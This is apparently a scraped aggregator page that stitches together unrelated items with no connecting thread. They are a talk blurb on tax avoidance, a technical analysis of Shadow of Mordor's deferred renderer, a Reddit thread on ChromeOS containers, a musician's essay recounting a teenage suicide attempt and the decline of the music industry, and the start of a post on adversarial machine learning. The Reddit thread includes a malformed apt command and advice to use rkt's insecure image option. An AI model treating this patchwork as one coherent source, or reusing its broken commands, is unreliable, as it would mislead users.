"Revelations of the extent of tax avoidance by multinationals based on exploitation of the arm’s length system prompted a rear-guard action by the OECD described as the base erosion and profit shifting (BEPS) programme but the programme deliberately avoids any principled re-examination of norms underlying the international tax regime or any consideration of a shift from residence to source-based taxation."

And the icing on the cake: We will present you the Stachanow of Capitalism: The only employee (on a mere 55.000 Euro annual salary) of ExxonMobil Spain: 9.9 billion Euro in net profits in 2 years.

Download

These files contain multiple languages.

This Talk was translated into multiple languages. The files available for download contain all languages as separate audio-tracks. Most desktop video players allow you to choose between them.

Please look for "audio tracks" in your desktop video player.

Tags

The Rendering of Middle Earth: Shadow of Mordor

$
0
0

Middle Earth: Shadow of Mordor was released in 2014. The game itself was a great surprise, and the fact that it was a spin-off within the storyline of the Lord of the Rings universe was quite unusual and it’s something I enjoyed. The game was a great success, and at the time of writing, Monolith has already released the sequel, Shadow of War. The game’s graphics are beautiful, especially considering it was a cross-generation game and was also released on Xbox 360 and PS3. The PC version is quite polished and features a few extra graphical options and hi-resolution texture packs that make it shine.

The game uses a relatively modern deferred DX11 renderer. I used Renderdoc to delve into the game’s rendering techniques. I used the highest possible graphical settings (ultra) and enabled all the bells and whistles like order-independent transparency, tessellation, screen-space occlusion and the different motion blurs.

This is the frame we’ll be analyzing. We’re at the top of a wooden scaffolding in the Udun region. Shadow of Mordor has similar mechanics to games like Assassin’s Creed where you can climb buildings and towers and enjoy some beautiful digital scenery from them.

Depth Prepass

The first ~140 draw calls perform a quick prepass to render the biggest elements of the terrain and buildings into the depth buffer. Most things don’t end up appearing in this prepass, but it helps when you’ve got a very big number of draw calls and a far range of view. Interestingly the character, who is always in front and takes a decent amount of screen space, does not go into the prepass. As is common for many open world games, the game employs reverse z, a technique that maps the near plane to 1.0 and far plane to 0.0 for increased precision at great distances and to prevent z-fighting. You can read more about z-buffer precision here.

G-buffer

Right after that, the G-Buffer pass begins, with around ~2700 draw calls. If you’ve read my previous analysis for Castlevania: Lords of Shadow 2 or have read other similar articles, you’ll be familiar with this pass. Surface properties are written to a set of buffers that are read later on by lighting passes to compute its response to the light. Shadow of Mordor uses a classical deferred renderer, but uses a comparably small amount of G-buffer render targets (3) to achieve its objective. Just for comparison, Unreal Engine uses between 5 and 6 buffers in this pass. The G-buffer layout is as follows:

Normals Buffer
RGBA
Normal.xNormal.yNormal.zID

The normals buffer stores the normals in world space, in 8-bit per channel format. This is a little bit tight, sometimes not enough to accurately represent smoothly varying flat surfaces, as can be seen in some puddles throughout the game if paying close attention. The alpha channel is used as an ID that marks different types of objects. Some that I’ve found correspond to a character (255), an animated plant or flag (128), and the sky is marked with ID 1, as it’s later used to filter it out during the bloom phase (it gets its own radial bloom).

Albedo Buffer
RGBA
Albedo.rAlbedo.gAlbedo.bCavity Occlusion

The albedo buffer stores all three albedo components and a small scale occlusion (sometimes called cavity occlusion) that is used to darken small details that no shadow mapping or screen space post effect could really achieve. It’s mainly used for decorative purposes, such as the crevices and wrinkles in clothes, small cracks in wood, the tiny patterns in Talion’s clothes, etc.

The albedo receives special treatment from a blood texture in the shader in the case of enemies (interestingly, Talion never receives any visible wounds). The blood texture is input to this stage when rendering enemies’ clothes and body, but it doesn’t specify the color of the blood, which is input in a constant buffer, instead it specifies blood multipliers/levels to control the amount of blood to show through. The normal orientation is also used to scale the effect, controlling the directionality of the blood splatter. The albedo then effectively gets tinted by the intensity of the wounds the enemy has received and at the location marked by the blood map, while also modifying other surface properties like specular to get a convincing blood effect. I haven’t been able to find the part of the frame where the map gets rendered, but I presume they’re written to right at the beginning of the frame when the sword impact takes place and then used here.

Specular Buffer
RGBA
RoughnessSpecular IntensityFresnelSubsurface Scattering Factor

The specular buffer contains other surface properties you’d expect from many games like roughness (it’s not really roughness but a scaled specular exponent, but can be interpreted as such), a specular intensity which scales the albedo to get an appropriate specular color, a reflectivity factor (typically would be called F0 in graphics literature as it’s the input to the Fresnel specular response) and a subsurface scattering component. This last component is used to light translucent materials such as thin fabric, plants and skin. If we delve into the lighting shader later on we find out that a variation of the normalized Blinn-Phong specular model is in use here.

Deferred Decals

As we’ve already seen, Shadow of Mordor goes to great lengths to show blood splatters on damaged characters. The environment also gets its own coating of dark orc blood as Talion swings his sword. However for the surroundings a different technique, deferred decals, is used. This technique consists of projecting a set of flat textures onto the surface of whatever has been rendered before, thereby replacing the contents of the G-Buffer with this new content before the lighting pass takes place. For blood a simple blood splatter does the trick, and by rendering many in sequence one can quickly create a pretty grim landscape.

The last thing that gets rendered in the G-buffer pass is the sky, a very high-resolution (8192×2048) sky texture in HDR BC6H format. I’ve had to tonemap it a bit because in HDR all the colors are too dark.

Tessellation

A very interesting feature of the game (if enabled) is tessellation. It’s used for many different things, from terrain to character rendering (character props and objects also use it). Tessellation here doesn’t subdivide a low-res mesh, but actually creates polygons from a point cloud, with as much subdivision as necessary depending on level of detail criteria like distance to the camera. An interesting example here is Talion’s cape, which is sent to the GPU as a point cloud (after the physics simulation) and the tessellation shader reconstructs the polygons.

Order-Independent Transparency

One of the first things that struck me as odd was the hair pass, as it runs a very complicated special shader. The graphics options mention an OIT option for the hair so this must be it. It first outputs to a separate buffer and counts the total number of overlapping transparent pixels while at the same time storing the properties in a “deep” Gbuffer-like structure. Later on, a different shader properly sorts the individual fragments according to their depth. Arrows seem to be rendered using this as well (I guess those feathers in the back need proper sorting too). It’s a subtle effect and doesn’t add a lot of visual difference but it’s a nice addition nonetheless. As a simple example here’s an image showing the overlapping fragment count (redder is more fragments). Regular transparency is still depth sorted in the CPU and rendered like traditional alpha. Only very specific items get into the OIT pass.

Shadows of Mordor

There are many sources of shadow in SoM. Aside from traditional shadow maps for the dynamic lights, SoM uses a two-channel screen-space ambient occlusion, micro-scale occlusion supplied for nearly all objects in the game, and a top-down heightmap-like occlusion texture.

Screen-space occlusion

The first pass renders screen-space ambient and specular occlusion using the gbuffer. The shader itself is a massive unrolled loop that samples both the full-size depth map and a previously downsampled averaged depth map looking for neighboring samples in a predefined pattern. It uses a square 4×4 texture to select pseudorandom vectors looking for occluders. It renders a noisy occlusion buffer, which is then smoothed via a simple two-pass blur. The most interesting feature here is that there are two different occlusion channels, one of them applied as specular occlusion, the other as diffuse. Typical SSAO implementations compute a single channel that applies to all baked lighting. Here the SSAO map is also read in the directional light pass and applied there.

Shadow Maps

The next event is shadow map rendering. Because it’s a mainly outdoors game, most of both the lighting and shadows come from a main directional light. The technique in use here is Cascaded Shadow Maps (a variation of which is Parallel Split Shadow Maps), a fairly standard long-distance shadowing technique which consists of rendering the same scene from the same point of view of the light for different regions of space. Normally shadow maps further away from the camera span either a larger distance or are lower resolution than the previous ones, effectively trading resolution in regions where the detail isn’t needed anyway due to geometry being far away. In this scene the game is rendering three 4096×4096 shadow cascades (the game actually has space for four), the top cascade being very close to Talion, while the bottom cascade includes mountains and objects far away from the camera. The game’s shadows also use the same reverse z trick as the depth map.

Shadow Buffer

The next step is to create a shadowing buffer. This is a 1-channel texture that encodes a [0, 1] shadowing factor based on the occlusion information from the previous shadow maps. To create a bit of softness around the edges the shadow map is sampled 4 times with a special bilinear sampler state which takes 4 samples and compares against a given value (this is called Percentage Close Filtering). Taking several samples and averaging their results is often called Percentage Closer Soft Shadows. In addition to reading from the shadow map, the specular buffer’s last component is also sampled (recall that this is a subsurface scattering factor) and multiplied times a “light bleed factor”, which seems to attempt to remove shadowing from these objects to let a bit more light through.

Directional Projection Texture

Another source of light and shadow is a top-down texture that is sampled by the directional light. It’s a color tint to the main directional light’s color plus a global shadowing term that is applied to the directional lighting. Some of it seems to have been hand-authored on top of an automatically-generated image of the level. The slideshow below shows the color tint, the occlusion, and the product of both factors which gives an idea of what the final color mask looks like.

The result of all the light passes gets saved into an R11G11B10F render target. This is the what the result roughly looks like. I tonemapped the results to make the influence of the directional on the level much more evident.

All the faraway mountains (not shown in the above image) also get lit by directional lights but they’re special cased to be able to control the lighting better. Some are at scale but the ones further away are actually flat textures (impostors) with cleverly authored normal and albedo maps. They have special directional lights affecting just the mountains.

Static Lighting

Shadow of Mordor uses a very memory-intensive static lighting solution that involves some very big volume textures. The image below represent the three static light volume textures used for the diffuse lighting of a part of this area. They are each a whopping 512x512x128 BC6H compressed texture, which is to say 256MB per texture or 768MB total (we are playing in high quality settings after all). The Color texture represents an incoming irradiance to a voxel. The other two represent the strength or amount of that irradiance along all six xyz and -xyz directions, with the normal serving as a way to select three components (positive or negative xyz, the ones most aligned with the normal). Once we’ve constructed this vector, we do the dot product of it and the squared normal and this becomes the scale factor for the irradiance. As a formula, this looks like the following:

{ normalSquared = normal \cdot abs(normal) }
staticVolumeVector.c = \left.  \begin{cases}  staticVolumePositive.c, & \text{if } normalSquared.c \geq 0 \\  staticVolumeNegative.c, & \text{otherwise}  \end{cases}  \right\}\text{, where c is x, y and z}
{ staticVolumeLighting = dot(staticVolumeVector, normalSquared) \cdot ambientOcclusionDiffuse \cdot staticVolumeColor }

 

Static Light Volume Color

 

Static Light Volume Negative Direction

 

Static Light Volume Positive Direction

Static Light Volumes also render a cubemap for the specular lighting, which were probably captured at the center of the SLV. Interestingly enough, while the volume textures store HDR values compressed in BC6H, cubemaps are stored in BC3 format (aka as DXT5) which cannot store floating point values. To compensate for this limitation, the alpha channel stores an intensity that is later scaled from 1-10. It’s a bit of an odd decision and to me it looks more like legacy. Remember this game was also released on the previous generation which doesn’t support newer HDR texture formats.

 

The following sequence shows the before and after, with the actual contribution in the middle image. They have been tonemapped for visualization.

Atmospheric Fog

Shadow of Mordor has a weather and time of day system that’ll take Mordor from sunny skies to murky rains as you progress through the game. There are a sum of components that drive this system, fog being one of the most prominent. Shadow of Mordor uses a fairly simple but physically-grounded atmospheric fog model, including a single-scattering simulation of Rayleigh and Mie scattering.

It starts off by computing the position of the camera from the center of Earth. A few trigonometric calculations end up determining where within the atmosphere the camera is, where the pixel is, and how much of the atmosphere the ray has traveled given a maximum atmospheric height. In this case the atmospheric height is set to 65000 meters above the planet surface. With this information the Rayleigh and Mie coefficients are used to compute both types of fog particle densities and colors. These densities occlude the already shaded pixels by dispersing the light incoming to the camera from the shaded surface and add the contribution of the fog. The radiance and direction of the sun is taken into account to simulate this scattering.

Exposure and Tonemapping

Exposure takes on the fairly typical approach of successively downsampling a luminance buffer computed from the main HDR color buffer into a chain of textures, each of which is half the size of the previous texture, starting off with a texture that is 1/3rd of the main framebuffer. This downsampling takes 4 samples that average the neighboring pixels, so after collapsing all the averages into a single texel, the final result is the average luminance. After the texture reaches 16×9 texels, a compute shader is dispatched that adds up all the remaining texels. This value is immediately read in the tonemapping pass to adjust the luminance values.

Tonemapping uses a variation of the Reinhard operator whose optimized formula can be found here and here. In hlsl code it would look like the following:

If we plot this curve we can see that this operator pretty much discards 10% of the whites even at an input value of 2.0, while forcing a small part of the bottom range to fully black. This creates a desaturated, dark look.

Alpha Stage

The alpha stage is a bit unusual, as it renders objects directly into the LDR buffer. Other games render them into the HDR buffer as well so they can participate in the exposure pass. In any case, the previously computed luminance texture is bound to all the alpha lit objects (in some cases like emissive objects the exposure is performed via shader constants, not a texture lookup) and therefore exposure is automatically applied when drawing instead of as a post process. A very particular case of alpha in this game is when you go into the specter mode in the game (a mode where the spirit of Celebrimbor, who forges the rings of power in the LOTR universe, is rendered on top of you as a means to show that he is always present, although invisible). The game passes a few parameters into both character meshes which control the opacity and allows the game to partially occlude Talion and gradually reveal Celebrimbor. Other objects in the game also render ghost versions on top of the opaque object in specter mode, such as enemies and towers. Here is a different scene midway through the transition to the spectral world.

Rain

The main capture we’ve been looking at doesn’t show rain but weather is such an important part of the game I wanted to mention it here. It is generated and simulated in the GPU, and gets rendered right at the end of the alpha stage. A compute shader is dispatched that runs the simulation and writes positions to a buffer. These positions get picked up by another shader that renders as many instances of quads as positions were computed in the previous pass via an instanced indirect call. The vertex shader has a simple quad that gets deformed and oriented towards the camera as necessary. To avoid rain leaking through surfaces, the vertex shader also reads a top-down height map that allows it to discard any drops below an occluding surface. This height map is rendered right at the beginning of the frame. The same vertex shader tells the pixel shader where to sample from a raindrop texture; if the drop is close to a surface it selects a region of the texture that has a splash animation instead. Raindrops also run the fog computation in the pixel shader to blend seamlessly with the rest of the scene. Here’s a screenshot from the same point of view on a rainy day.

While the rain effect is active, the specular buffer is modified globally to produce wet surfaces, and rain waves are rendered into the normals buffer. The animation is tileable so only a single frame of the looping animation is used. The following normals buffer has been modified in order to see the ripples rendered into the buffer.

Lens Flares and Bloom

After all alpha has been rendered, lens flares get rendered on top. A series of offset quads are rendered starting at the point where the directional light is coming from (the sun in this case). Immediately after, the bloom pass is performed. This is a fairly standard technique, which consists of a series of downscaled and blurred textures that contain pixels whose luminance is above a certain threshold. There are two bloom passes, a general Gaussian blurred one for the scene and a special radial blur that only applies to the sky. The radiul blur is one use of the special ID in the normal map G-Buffer, since only pixels from the sky are taken into account. As a bonus, this blur samples the depth map and is able to produce some inexpensive godrays. Because the buffer we’re working with at this stage is LDR, the bloom threshold isn’t what you’d expect from an HDR pipeline (values above a threshold, typically 1.0, trigger bloom), which means the amount of bloom you can get from it is a bit limited. It works for the game in any case and here are the results. In the images below the bloom mip colors look weird because every pixel is scaled by the luminance contained in the alpha channel. This luminance had been previously computed in the tonemapping pass. In the final composite the bloom is calculated as bloom.rgb · bloom.a · bloomScale

AA + Depth of Field

There isn’t much to say about these two as they’re relatively industry standard, a simple FXAA antialiasing pass is run right after bloom is composited onto the LDR image, and depth of field is performed immediately after. For the depth of field the game renders two downscaled blurred versions of the final buffer. Pixel depth is then used to blend between the blurred image and the normal one, giving it the unfocused appearance. I have exaggerated the depth of field for this capture for visualization purposes. The game has an in-game screenshot mode that allows you to very easily tweak these conditions.

Motion Blur

Motion blur consists of two passes. First, a fullscreen velocity buffer is populated from the camera’s previous and current orientation, filling the first two channels of the texture with a screen-space velocity. The r channel is how much a pixel has changed in the horizontal dimension of the screen, g channel for the vertical. That’s how you get radial streaks as you move the camera around. The characters are rendered again, this time populating the blue channel as well, using their current and previous poses just like with the camera. The blue channel is used to mark whether a character was rendered or not. The alpha channel is also populated with a constant value (0.0598) but I didn’t really investigate too much what it means or its purpose. The velocity buffer is then downsampled into a very small texture, by averaging a relatively wide neighborhood of velocities in the original texture. This will give each pixel in the final pass a rough idea of how wide the blur radius is going to be in the actual blur pass.

The blur pass then reads both velocity textures, the depth map, the original color buffer and a noise texture, that last one to hide the mirror image effect that can occur when doing this kind of blur with a large radius. The image buffer is then sampled several times in the direction the velocity buffer is pointing to, averaging the colors which ends up blurring the image in the direction of the motion vectors. The effect is also scaled by the frames per second the game is running at. For this capture, I had to cap the game at 30fps, as it was barely noticeable at 60fps+.

Color Correction

A final color correction pass is performed using “color cubes”. A color cube is a 3D texture whose rgb components map to the xyz coordinates of the texture. These xyz coordinates contain a color, the color we are going to replace the original color with. In this case the LUT was the neutral one (i.e. the coordinate and the color it contains are the same value) so I’ve modified the same scene with some of the different presets the game comes with in the camera editor.

Final Frame

After the main frame has finished, the UI is rendered onto a separate buffer. This guarantees that no matter the resolution you have chosen for the backbuffer in the game, the UI will always render crisp and nice into the native window size, while the game can vary its resolution if needed for performance. At the end, both textures are blended together based on the UI’s alpha channel and rendered into the final framebuffer, ready to be displayed.

I hope you’ve enjoyed reading this analysis, comments or doubts are welcome. I would like to thank Adrian Courrèges for his amazing work which has inspired this graphics study, and the team at Monolith for this truly memorable game.

ChromeOS: How VM and Containers will seem to run

$
0
0

Very interesting, great writeup! As someone who does fulltime development on a Pixel 2 with Crouton, I would love love love first class support that allows me to get my unix toolchain running without devmode.

Same, I've been developing in a chroagh chroot, but that project is abandoned.

If I can start running docker containers on my Chromebook that would be a significant change to my current workflow.

I'd buy a new Pixelbook and throw this Surface Pro 4 under a bus.

So in layman's terms, does this mean that at some time in the future we'll be able to launch a VM of a Linux instance and run Linux programs through that without having to jump through a ton of hoops?

Yes. Pretty much.

What would be really interesting would be if this could extend to windows vms too.

Good writeup :) Although vmc will only be used for untrusted/non-official containers. The Google-signed containers use a different command.

There are still parts not merged even into master, so I would wait a little longer before trying to play with these, but good things are coming to those who can wait :)

But I can't wait! :-P

Are the Google containers actually signed, or are they assumed safe because of their location? I'm asking because I'm ready to try my hand at making a custom container, placing it in /opt/google/containers and using the dbus message to get them going.

Where you able to run containers with vmc now that the pixelbook is out?

I don't have a Pixelbook. You can read a bit of update on my progress here but still no.

I was gutted none of this was mentioned in the event yesterday. It's such a game changer, it makes me think it could be further away than I expected to not get any mention. What do people think, early next year maybe?

Yeah same. I'd be really happy to just have a replacement for crouton/just have linux containers at first, but maybe they're just waiting to release everything at once.

This might make me keep one of my pixel 2 LS. The other is still for sale.

What are you listing it for? I have one and have been considering selling it too

[deleted]

If you're in the market, why not just wait for the Pixelbook? Does the LS have something the Pixelbook doesn't?

$900

One thing I still have not been able to determine is if people think this functionality will be limited to linux programs. Do the commits suggest that google will be bringing windows containers and VMs? Easily the #1 thing I am missing on my chromebook is office, and no I don't want to spend $100 a year (office 365) for something I get from my work for free (Office 2016).

If you put your chromebook in dev mode, you can install the MS office android suite.

In the case of Windows it could not be a container under ChromeOS, since it's an entirely different operating system/kernel. Android x86/Ubuntu/etc could run in containers since it can use the main ChromeOS Linux kernel.

Thanks. I've had a rough time trying to understand exactly what the heck containers are vs VMs, but that makes sense.

The way I look at it is this: VMs virtualize physical hardware (so unique kernel and drivers in memory each simultaneous execution), while containers virtualize the operating system running under a core kernel (so kernel and drivers need only be loaded once), so that's why VMs incur more overhead but have more abilities as a result.

That's how I look at it too.

So containers would just run the user space right?

As the main post suggests, untrusted containers are run within virtual machines. Windows can run in a VM just fine.

I'm not really familiar with containers or VMs or docker, but after reading this post I did a search for a few of the programs I use in crouton "[program name] docker" and each of them had results show up as "Public | Automated Build" on the Docker site.

Does this mean if I get Eve, I could somehow run these? And without being in Dev mode?

It's all speculation right now but the correct answer is "maybe".

We're largely at the mercy of Google for what functionality they actually enable, which is not the same as what functionality they could enable. For instance, they could put in a 100% compatible Docker environment, but then limit you to a custom repository.

Similarly, they could say that only Device X gets container Y, or even container functionality at all, like they did with Android compatibility.

Ultimately,the fact that a function exists within ChromeOS does not imply that it's being enabled for direct user consumption. They could just as easily use this as better separation between Android app processes.

I'm a bot, bleep, bloop. Someone has linked to this thread from another place on reddit:

 If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.(Info/Contact)

Really does not have to be that difficult. You can run Docker containers with just a regular Intel Chromebook and using Crouton.

Install iptables

sudo apt iptables libnfnetlink0

then

sudo rkt run --net=host docker://redis --insecure-options=image

rkt support Docker containers from the Docker repository.

The Loneliness of the Long Distance Rocker

$
0
0

When I was fourteen years old I wanted to die. I felt doomed to be alone. My prospects for meaningful connection with other humans seemed bleak. I wasn’t consciously aware of my desire to end my life until one evening a switch flipped and I was done with this bullshit world. I drank poison and ate pills and spent the night in the hospital, surviving by the narrowest of margins. When I emerged into consciousness, waking up to my second act, I was singing a song. My delivery was mumbling and incoherent, to be sure, but it was a song nonetheless, specific and discrete.

From that point on, everything else, everything that wasn’t music, sloughed off. My dedication to my schoolwork disappeared as well as my athletic ambition, but so did my determination to end my own life. Writing songs was my way out, or rather back in—the act of creation made meaning where there had been none. And best of all, music brought with it a heretofore secret world of generous like-minded people who had also found meaning in the simple act of turning silence into songs.

I appeared in school talent shows to begin with, then I played between local bands at the clubs in the bohemian music district of Dallas known as Deep Ellum. All the while I was singing and strumming in parks and bedrooms and backyards. I engaged in good-natured arguments with fellow musicians over the meanings of songs, the hierarchies of greatest albums, and the elusive chords from our favorite tunes. In those pre-internet days we had to learn songs by ear, stopping and starting thinly stretched Maxell cassettes as we puzzled over the muddy transition from an A minor to an F.

The people in my local music scene were classmates, girlfriends, and older kids who’d attained a level of cool that didn’t even seem possible; and weirder still, they were all my friends. This world was dirty, impoverished, and occasionally dangerous but it was never lonely. You might not dig his or her music, but it was pretty rare to dislike a fellow musician.

We all knew there was a cutthroat cabal of music industry execs waiting on the top floor of a tower in Rockefeller Center, but we also knew that we were the good guys.

In the days of the old business model, there were successful predators at the top of the food chain, but the kids who made the music were hiding down in the bushes with our friends. The local model of music delivery, unlike the giant streaming info-combines that lord over today’s music world, had a strikingly flat hierarchy of striving characters: the club owners, record store clerks, college radio DJs, and rock critics who owed a thousand words to the local weekly. At closing time on any given night in the ’90s you could find any or all of these satellite scenesters mixed in among the proper musicians at the Art Bar in Dallas, behind Club Clearview. We all knew that there was a cutthroat cabal of music industry execs waiting on the top floor of a tower in Rockefeller Center to offer us a lopsided contract, but we also knew that we were the good guys, the proletariat to their bourgeoisie, the Rebel Alliance to their Empire. We had each other’s back. The worst thing we could be expected to do was steal a girlfriend from one of the Buck Pets or envy the Toadies their unexpected national radio play. Those were, as they say, the days.

The Talent Scouts are Bots

It’s all different now. My own observation of the current music industry is colored by my history with the extinct model. I can’t begin to imagine what it must be like to come up in this world of SoundCloud rappers and Swedish hit factories churning out auto-tuned EDM or whatever. Believe me, I’m keenly aware that even these two meager examples must make me sound impossibly old. My point is that if I was a fourteen-year-old depressive nowadays, I’m not sure what would even draw me into the world of music to begin with. The ability to record oneself in a bedroom represents an impressive flash-forward advance in technology, but it also is profoundly isolating. For starters, it negates the very human necessity of convincing small-time investors to fund a session, or the simultaneously joyful and agonizing experience of collaborating with the requisite technicians to make such a recording happen. In short, it eliminates people from the equation. And more to the point, it eliminates all the good people from the equation.

You’ve still got the execs in the tower in Rockefeller Center—only now all the lower floors that used to house the junior execs and the young A&R kids are crammed with barbed wire and land mines. The Artists & Repertoire department has been replaced by a bot that alerts the label chief when an artist reaches a predetermined number of Twitter followers or Facebook likes. This sort of micro-market calculation was once anathema to creativity—it’s the origin of the old punk-rock contempt for “the suits” who moved product on the AM airwaves. Today, however, an obsessive attention to online clicks and listens is all that an independent artist can rely on to outfox the system. Writing a song might now be less important to your success than paying for a hundred thousand imaginary account holders to follow you on social media.

That’s a lot of followers! So why do you feel so lonely? This hyperindividualist model of market predation seems directly aimed at one of the true joys of making music: a genuine, collaborative dedication to craft for its own sake.

Even though my own career benefited tremendously from the last gasp budgets of the old model, I’m not grandfathered out of the cynicism engendered by this new cutthroat world. As the old (and abundantly flawed) avenues of income are closed off entirely, our new music delivery system reroutes the great majority of returns from music-making back to the corporations.

Artists have never been good at maximizing the monetization of their work. And in the new money-challenged world of music, we’ve found ourselves cut out almost entirely. Even casual observers saw the shift from purchased music, which still managed to allot a small percentage of the profit to the artist, to music’s current state of literal worthlessness. Now the streaming services negotiate backroom deals with labels that dole out fees to artists in such minuscule sums that you would lose money by burning the gas it would require to drive to the bank to deposit the check in your account.

And the kids are listening on YouTube, a service that brilliantly shows advertisements before allowing the kids to consume their music. Does YouTube share the revenue generated by these commercials with the creators of the content? Does YouTube give the artists in question any say over whose ad might be attached to the art they created? Hell no. Why would they? They’re the Empire, remember? They’re just sitting in their dumbass Death Star counting their money.

It used to be that musicians could hope for the unexpected and sometimes tax-bracket elevating gift of mailbox money in the form of licensing fees paid by films, TV shows, and ad agencies. There’s a (perhaps apocryphal) old story about Nick Lowe, whose “(What’s So Funny About) Peace, Love & Understanding” was covered by some cheeseball on the soundtrack of the hit Hollywood movie The Bodyguard. In the story, Lowe (who’d recently been dumped by Warner Brothers, his longtime record label) stumbles out of his middle-class house in his bathrobe to retrieve the mail and discovers a check for a million dollars. A decade ago, a manager friend of mine who was haggling with an agency over a licensing fee told me he envisioned a future where instead of the company paying the artist to place the song in a commercial, it would work the other way around.

That’s our world now. In a post terrestrial radio era, music supervisors act as de facto A&R reps, and placement is one more thing artists are willing to give away pretty much for free.

When they’re feeling particularly ungenerous, the company will cut you out altogether. Google did that to me when they used the guitar riff from my song “Question” as the bed music in a commercial for one of the company’s crappy phones. Google hired an ad agency. The ad agency hired a jingle house, probably giving them “Question” as a reference track. Grateful for the work, some dude in a windowless room at the jingle house (probably himself another victim of the modern music biz; maybe he used to be in bands but was now trying to feed his kids by making innocuous instrumental music to go under Google ad voice-overs) re-recorded my riff, cleverly adding an extra note at the end of the progression—just enough to absolve his employer of any obligation to compensate me for having written the thing to begin with.

I did what any aggrieved artist should do when their work has been ripped off: I contacted my publishing company’s lawyers to threaten these digital brigands with a lawsuit. Within the ranks of the publishing company, it was unanimously agreed that we had Google over a barrel. But then they hired a musicologist who specialized in copyright infringement and he pointed out the almost imperceptible difference between the two recordings. His prediction was that it was possible but unlikely we could win in court. After my publishers sized up the odds of going against the great content leviathan, they advised me to drop the idea. I agreed reluctantly, and lost a few nights’ sleep thinking of how lucky the Nick Lowes of the world had been: here, some untold millions of ad viewers would be hearing a nearly note-for-note rendition of a song I wrote, and all I was getting in return was teeth-gnashing insomnia.

I considered making a video documenting the Google heist, featuring an A/B demonstration of the two versions of the song. I would certainly have prevailed in the court of public opinion at least. I could have told the story of how I’d written the song after spending a day in London falling in love with the woman I’d go on to marry, maybe show some pictures of our sweet kids that I’m busting my ass to feed in this barren new musical landscape. But in the end I didn’t want my career narrative to be overtaken by an Ahab-like quest for the leviathan’s unlikely destruction. I took a deep breath and let it go.

Battle of the Brands

There’s another less obvious casualty of the great digital enclosure of the music business: as Spotify, YouTube, Apple, Google, et al., hoover up nearly all the available profits, the people marooned on the production side of a revenue-starved business model are trapped in a perennial race to the bottom, just to get by. This means that even the best-intentioned people, who got into music for the best possible collaborative reasons, are forced to reposition themselves as small-time hustlers, whose younger selves would likely be appalled to encounter them in today’s always-be-closing mode.

This is far from an abstract proposition for me. When I was a kid, my grandmother introduced me to a local record storeowner she’d met in the little shopping center near her house. He must have seen some potential in my teenage flailing because he offered to manage me and eventually helped me put out my first little solo album. It was a sweet, heady time. I was learning so much, so quickly. The record itself reflects the larval stage of my development and I cherish it as one might a baby photo, but I don’t want it to be presented now alongside my adult work.

The A&R department has been replaced by a bot that alerts the label chief when an artist reaches a predetermined number of Twitter followers or Facebook likes.

Fast forward thirty years, and this same early backer is haranguing me to make the record available on Spotify—an arrangement that, in addition to once more placing my career narrative in someone else’s profit-hungry hands, wouldn’t even yield him a serious cash return for his efforts. (See the preceding two thousand words.) The vitriol of his emails arguing against my right to determine the availability of this recording I’d made thirty years earlier stunned me. He threatened to sue me, claiming in essence that I was taking food from the mouths of his (now grown) children. Mind you, this is an album from the sales of which I had never seen one cent. I’d never complained. It had never occurred to me. And here we were, suddenly enemies? My sweet little grandmother could never have foreseen this.

The only way to carry over a lucrative music career in the prevailing market conditions is to puff oneself into a mammoth brand of the Taylor Swift/Kanye/Beyonce ilk. Bands, as over-romanticized as they may be by the rockers of my own generation as fearless anarcho-syndicalist collectives, no longer occupy a viable perch in the music ecosystem. Many of the new ones taking root in this top-heavy scrum to market online product have been systematically drained of all recognizable human traits—autotuned inside and out. As a dad seeing my kids fall for an indistinguishable blob of well-coiffed brandoid bands and Disney graduates, I’m not at all shocked that amid their many fast-germinating aesthetic and creative ambitions, my own offspring have never seriously taken it into their heads to pick up an instrument or start a band. The craft of music has entirely succumbed to its marketed spectacle.

There are, to be sure, many healthy exceptions to this rule. In garages and basements and dorm rooms across the country and around the world, bands are forming this very minute. They are arguing over favorite songs, greatest albums, Stratocaster versus Telecaster, and inevitably which one of the members is going to have to switch from guitar to bass. These hopeful young dreamers give me hope.

But we also shouldn’t kid ourselves: they are exceptions. For every one of these fledgling anarcho-syndicalist collectives, there are a thousand or a million kids alone in their bedrooms staring at Protools screens wondering what they have to do to get the Swedish cabal to write a hit song for them. They download a file onto Bandcamp or YouTube, start logging the hits, and pray.

And oh my God, that sounds so lonely.

Music saved my life. And musicians. And club owners, record store clerks, college radio DJs, and rock critics who owed a thousand words to the local weekly. We were often reckless, short-sighted, and profligate, but we were all in this together. And now there’s no more this.

Adversarial Learning for Good: On Deep Learning Blindspots

$
0
0

When I first was introduced to the idea of adversarial learning for security purposes by Clarence Chio's 2016 DEF CON talk and his related open-source library deep-pwning, I immediately started wondering about applications of the field to both make robust and well-tested models, but also as a preventative measure against predatory machine learning practices in the field.

After reading more literature and utilizing several other open-source libraries, I realized most examples and research focused around malicious uses, such as sending spam or malware without detection, or crashing self-driving cars. Although I find this research interesting, I wanted to determine if adversarial learning could be used for "good".1

A brief primer on Adversarial Learning Basics

In case you haven't been following the explosion of adversarial learning in neural network research, papers and conferences, let's take a whirlwind tour of some concepts to get on the same page and provide further reading if you open up arXiv for fun on the weekend.

How Does It Work? What Does It Do?

Most neural networks optimize their weights and other variables via backpropagation and a loss function, such as Stochastic Gradient Descent (or SGD). Similarly to how we use the loss function to train our network, researchers found we can use this same method to find weak links in our network and adversarial examples that exploit them.

To get an intuition of what is happening when we apply adversarial learning, let's look at a graphic which can help us visualize both the learning and adversarial generation.

gradient descent graphicSource Image

Here we see a visual example of SGD, where we start our weights randomly or perhaps with a specific distribution. Here our weight produces high error rates at the beginning, putting it in the red area, but we'd like to end up at the global minimum in the dark blue area. We may, however, as the graphic shows only end up in the local minimum of the slightly higher error rate on the right hand side.

With adversarial sample generation, we are essentially trying to push that point back up the hill. We can't change the weight, of course, but we can change the input. If we can get this unit to misfire, to essentially misclassify the input, and a few other units to do the same, we can end up misclassifying the input entirely. This is our goal when doing adversarial learning and we can achieve it by using a series of algorithms proven to help us create specific perturbations given the input to fool the network. As you may notice, we also need to have a trained model we can apply these algorithms to and also test our success rate.

Historical Tour of Papers / Moments in Adversarial ML

The first prominent paper on adversarial examples came in the form of a technique to modify spam mail to be classified as real mail, published by a group of researchers in 2005. The authors used a technique of addressing important features and changing them using Bayesian and linear classifiers.

In 2007, NIPS had their first workshop on Machine Learning in Adversarial Environments for Computer Security which covered many techniques related primarily to linear classification but also other topics of interest in security such as network intrusion and bot detection.

